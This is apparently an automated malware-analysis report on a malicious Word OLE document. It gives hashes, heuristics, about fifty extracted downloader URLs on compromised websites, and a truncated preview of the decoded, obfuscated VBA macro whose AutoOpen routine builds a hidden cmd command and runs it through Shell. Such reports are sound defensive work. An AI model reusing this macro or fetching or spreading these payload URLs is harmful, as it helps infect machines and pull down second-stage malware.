Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d20a41a8d80079fa…

MALICIOUS

Office (OLE)

280.9 KB Created: 2018-07-25 09:34:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: fdd41a3d54f97a164fccfd7fb3281233 SHA-1: 411f8e2824b73b21ca2ac1e5b69a088b396d64c4 SHA-256: d20a41a8d80079fa14a421b4d718384836697854f8cf32aacac5977437f25fa3
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script uses the Shell function to execute a command, indicating an attempt to download and run a second-stage payload. The presence of numerous unknown-reputation URLs suggests potential C2 infrastructure or payload hosting.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6735715-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6735715-0
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 287,618 bytes but its declared streams total only 147,264 bytes — 140,354 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.dreamyartcreation.com/wp-content/themes/sketch/languages/mod_filezipr.php In document text (OLE body)
    • http://www.sunriseclassic.net/wp-content/plugins/shiftnav-responsive-mobile-menu/admin/mod_filezipr.phpIn document text (OLE body)
    • http://www.prexcolatino.com/wp-content/uploads/2016/05/mod_filezipr.phpIn document text (OLE body)
    • http://www.mpkdk.sk/templates/dd_dreamnight_38/images/slideshow/mod_filezipr.phpIn document text (OLE body)
    • http://www.4.sablecreations.com/ognerrte/wtuds/mod_filezipr.phpIn document text (OLE body)
    • http://www.beauty2.mocksitetest.com/wp-includes/js/tinymce/utils/mod_filezipr.phpIn document text (OLE body)
    • http://www.mudanzasyserviciosayala.com/wp-content/plugins/responsive-lightbox/assets/mod_filezipr.phpIn document text (OLE body)
    • http://www.unde-iesim.ro/wp-includes/Text/Diff/Renderer/mod_filezipr.phpIn document text (OLE body)
    • http://www.speed.webcoder.ch/bins/lib/bootstrap/fonts/mod_filezipr.phpIn document text (OLE body)
    • http://www.grocery.uniqamart.com/wp-content/plugins/woocommerce-email-control/languages/mod_filezipr.phpIn document text (OLE body)
    • http://www.forestspa.ro/old/insite/plugins/better-wp-security/mod_filezipr.phpIn document text (OLE body)
    • http://www.sanjaykumar.us/wp-content/themes/gom-preum/css/mod_filezipr.phpIn document text (OLE body)
    • http://www.bluebelllanenew.mcveighmedia.com/wp-content/themes/twentysixteen/css/mod_filezipr.phpIn document text (OLE body)
    • http://www.handymanandatruck.com/wp-includes/js/tinymce/skins/mod_filezipr.phpIn document text (OLE body)
    • http://www.hellomarrakeshnew.212dev.com/wp-content/themes/twentyseventeen/inc/mod_filezipr.phpIn document text (OLE body)
    • http://www.hkiaa.org.hk/wp-content/plugins/admin-menu-manager/css/mod_filezipr.phpIn document text (OLE body)
    • http://www.dario.rjhdesigns.net/wp-content/uploads/2018/03/mod_filezipr.phpIn document text (OLE body)
    • http://www.clichy.212dev.com/wp-admin/css/colors/ocean/mod_filezipr.phpIn document text (OLE body)
    • http://www.neselievim.com/wp-content/cache/wpfc-minified/mcnl8fcl/mod_filezipr.phpIn document text (OLE body)
    • http://www.englishintuition.org/wp-content/plugins/mashsharer/templates/mod_filezipr.phpIn document text (OLE body)
    • http://www.jeffandrus.com/rw_common/themes/Bold/images/mod_filezipr.phpIn document text (OLE body)
    • http://www.swedmotor.seadministrator/components/com_tags/controllers/mod_filezipr.phpIn document text (OLE body)
    • http://www.kimlongac.com/administrator/components/com_installer/models/mod_filezipr.phpIn document text (OLE body)
    • http://www.ultrateknik.com/wp-content/themes/twentysixteen/css/mod_filezipr.phpIn document text (OLE body)
    • http://www.mytrinityumc.org/wp-content/uploads/2018/04/mod_filezipr.phpIn document text (OLE body)
    • http://www.warsawapartments.biz/test/images/babka_tower/ckrjhw/mod_filezipr.phpIn document text (OLE body)
    • http://www.website-m.ru/wp-content/plugins/google-analytics-dashboard-for-wp/realtime/mod_filezipr.phpIn document text (OLE body)
    • http://www.cranwood.mcveighmedia.com/wp-content/plugins/contact-form-7/includes/mod_filezipr.phpIn document text (OLE body)
    • http://www.app-fellow.tiensamedia.com/wermure/wtuds/mod_filezipr.phpIn document text (OLE body)
    • http://www.almelhemprees.com/wp-content/themes/twentyseventeen/inc/mod_filezipr.phpIn document text (OLE body)
    • http://www.codepilates.com/wp-content/plugins/litespeed-cache/tpl/mod_filezipr.phpIn document text (OLE body)
    • http://www.thesmilecraft.com/wp-content/plugins/squirrly-seo/classes/mod_filezipr.phpIn document text (OLE body)
    • http://www.apolloniblom.com/wp-content/ew_backup/2015/06/mod_filezipr.phpIn document text (OLE body)
    • http://www.ono.businessdemosite.com/wp-content/uploads/2018/09/mod_filezipr.phpIn document text (OLE body)
    • http://www.trustorbit.com/wp-content/uploads1/2015/11/mod_filezipr.phpIn document text (OLE body)
    • http://www.mobile.handymannexpress.com/lib/Zend/Gdata/Media/mod_filezipr.phpIn document text (OLE body)
    • http://www.courses.jsswebdev.com/wp-includes/js/jquery/ui/mod_filezipr.phpIn document text (OLE body)
    • http://www.test.vividlipi.com/wp-content/pluginsss/give/includes/mod_filezipr.phpIn document text (OLE body)
    • http://www.kimiez.com/wp-includes/SimplePie/Content/Type/mod_filezipr.phpIn document text (OLE body)
    • http://www.test5.ts.com.ps/wermure/wtuds/mod_filezipr.phpIn document text (OLE body)
    • http://www.healthyproductrecipe.com/wp-admin/css/colors/blue/mod_filezipr.phpIn document text (OLE body)
    • http://www.420productnews.com/wp-content/themes/twentyfourteen/page-templates/mod_filezipr.phpIn document text (OLE body)
    • http://www.bdglory.com/wp-content/cache/object/9c5/mod_filezipr.phpIn document text (OLE body)
    • http://www.dghsf.com/wp-content/themes/zenwater/inc/mod_filezipr.phpIn document text (OLE body)
    • http://www.minhhai-exim.com/wp-content/plugins/advanced-custom-fields/core/mod_filezipr.phpIn document text (OLE body)
    • http://www.travelphone.co.za/cgi-bin/.svn/tmp/wcprops/ini_mod_filezipr.phpIn document text (OLE body)
    • http://www.inmobiliariaviviendas.com/wp-content/plugins/contact-form-7/admin/mod_filezipr.phpIn document text (OLE body)
    • http://www.quidditchuk.imcatherinegrace.com/wp-content/plugins/jetpack/scss/mod_filezipr.phpIn document text (OLE body)
    • http://www.blueprintpizzaupdate.mcveighmedia.com/wp-content/themes/twentythirteen/js/mod_filezipr.phpIn document text (OLE body)
    • http://www.projectionscreen-tech.com/administrator/components/com_weblinks/helpers/mod_filezipr.phpIn document text (OLE body)
    +1020 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29723 bytes
SHA-256: 831614cd71219df8270d1591dba916d447de8f28a6c1285cc7561766d30988b2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jovqOBvRlNiVR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MJjaaH = SrzLBh
   TwYpd = CInt(FjzBj / ZzUKNO * 22030 - hQFSJl)
   uSrnF = 6
wMYIzu = "" + MvMVUIGZN + RzzzQipROnucPw + CVar("cm") + CUhRviLXzwY + DHNLKdV + UIzWwNJL + uTAvWVmp + hQqafY + tSJJEbjfzB + izvaAvGAmP + SOFJuJaEO + ianZnrivkS + vZDKCH + wDMhH + EGjJhOqrk + lUMFX + YYjizjCt + OqCbYKOQaS + RYChw + aNDaSPHasQv + GqfXVKsnm + iWCddKj + SDVHwnicz + lflGdnRMqRY + wCVNHkNZT + YuNliTfZY + HtbXa + bHmVdV + iOOQT + VGQrzww + CKnZks + DdBvD + RqTQibQWN + JdUbOITBWT + iWYrkMLij + zajJrhOX + FEIGUiLKbR + lJHtrLSnmF + SnqSzzuQoU + KjGShTf + ltBbWwG + hlnMJDiBPLq + mdCuwmM + ZIchFfzzm + BhNIuiTAZHiYuw
   XtHEU = 311
   rGjsB = CBool(5)
Shell@ wMYIzu, 0
   aoLiA = Cos(4874)
End Sub


Attribute VB_Name = "YaRCzHvjhlTcHt"
Function UIzWwNJL()
On Error Resume Next
pVACZ = HSdsnf
   mJozl = Tan(QrIbjZ)
oMUAvlYns = "d" + "     " + "   " + "       " + "/c       "
LJOfVD = CBool(501)
PwqWjj = "  " + "      C" + "Md  /v:   " + "   /" + "c" + "  " + CStr(Chr(sViAWzlZ + owfLcccnOWbdLQ + 34 + BRiakHGuVF + TaqdscXLms)) + " sEt  " + " '{@]"
zbzwN = Sin(SzkGU)
   wWDfN = 816
   bWLVN = CLng(60)
nQwiJw = "=\_\_" + "---/-\_\/"
zFRjV = 233439149
   PZliT = 3364
WNzQnYIZrOs = "_/ /"
ktzHvh = 40
   qikYm = Rnd(32873 * XErOo * 94395 + wKvFzb)
   orFUhB = UuTJw
knGAXnff = "/\_" + "-" + "_-\\" + "\"
UIzWwNJL = oMUAvlYns + PwqWjj + nQwiJw + WNzQnYIZrOs + knGAXnff
   ODYll = Rnd(62815 * 24518)
   uFica = Tan(NHjlzq + SRjCMk)
   iBrUaB = CDate(qjkjz)
End Function
Function uTAvWVmp()
On Error Resume Next
KJzJRNGo = "--/__"
HCfdb = CLng(96462 - hBquj * 69058 / bRoPDH)
   lqajYs = Log(5)
   rMPEmI = jGQABQ
FtOqDwjuOr = " -/" + "_/_\-" + "\" + "--\//_\ " + "\" + "//_-\-_\/" + "_-/-\ -\_\"
QQlFa = Rnd(95)
   IfuhSd = CBool(OtibiN)
mcmDFYXVjwZ = "-/-_//\_-" + "_/ \/_/" + "//_\" + "_-" + "--_-\ /\_-" + "_-_/--"
jlMsO = Chr(24655 * sqlYiP)
   IwZZV = jsiwY
   PFiwM = Hex(2)
FZYqdYjvCH = "\_/\\" + " \-\\/" + "/" + "_" + "_/-/"
ofdkNz = 4
   vzQWSL = GkdCDl
pMkiUDCXpaC = "-_" + "\- \/" + "\/_\/_-" + "\/-__- -_" + "-\/\"
QnDtiw = UUtuoI
QVvoMvFaUpA = "\_-_" + "///\- " + "//-_" + "_--\_-\/" + "/_\"
uTAvWVmp = KJzJRNGo + FtOqDwjuOr + mcmDFYXVjwZ + FZYqdYjvCH + pMkiUDCXpaC + QVvoMvFaUpA
   GBOvXR = vztQvH
End Function
Function hQqafY()
On Error Resume Next
EjTjGH = Oct(SiPzAH)
   fvNMrf = Sgn(7)
   XdFiH = CByte(cnnhj)
zPFaFT = " -" + "-" + "_\_///-" + "\\-\/_ _/-" + "\\-\/\-_/-"
GIaQaHS = "__ --_//__" + "--_/\\\" + "\ -\/_\"
OruhHWmjOv = "-/_\" + "/-\/-_" + " _/-/\\"
MNlEY = WaQFCw
   SVDYa = Cos(pivFv / zPAAF + tNGdAJ - HsUWAK)
QHVfjmqmKU = "\" + "/-_" + "_/\-- --\" + "/-//" + "\/\_\-__ -"
HzQSM = "-/\___/\//" + "\_\-}\\/-_" + "_/-_//_\\"
MMmiXQ = CStr(oVujS)
TSEizDTmBE = "-"
hQqafY = zPFaFT + GIaQaHS + OruhHWmjOv + QHVfjmqmKU + HzQSM + TSEizDTmBE
   uuHKl = 856
End Function
Function tSJJEbjfzB()
On Error Resume Next
UZMIK = CDbl(7)
   hFWnpY = 9052
CPmQviWiwz = "}\\/" + "/_\\" + "_-" + "-_/--_{_"
YZbAmp = Sqr(OjkOpV)
   lLZPJ = Tan(YHEFKH + NwiwQE / BcLPYi - sCNBf)
ljWAJQbAmzq = "-//" + "__-\/\" + "--/\\h_/\" + "/_/\-" + "/" + "\-_--_c_"
blqOvduv = "\_" + "/\/-\--"
LuJzPI = Log(20)
FWVOUMU = "/" + "\/-_t//" + "_\--\_/" + "/\--\_a" + "\-_\\__-" + "-/-"
tSJJEbjfzB = CPmQviWiwz + ljWAJQbAmzq + blqOvduv + FWVOUMU
   EPUBH = VcQZS
   ajjErE = Int(owoWCv * PzmtbB)
End Function
Function izvaAvGAmP()
On Error Resume Next
AJsfj = 42
EutHi = "///\c/-\_/" + "-_\_\/_" + "-/-}/\_/\" + "\___-/--\-" + ";_-/_--" + "//\\-/" + "\\_k\_/-"
pvpiD = "_" + "\//" + "_-_-\\/a-" + "\/\/_" + "-/-\" + "-\_/" + "_e-_\_-"
GfPQu = CBool(cPYII)
SkWYMjjKpT = "\-/_/\" + "//-\r-//" + "_\_\_\-_-/" + "/\b--\_//" + "\-_//\__-" + ";//\/\-_-" + "\\/_-_-h"
wknSG = Hex(cBvShr / IplrbU)
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.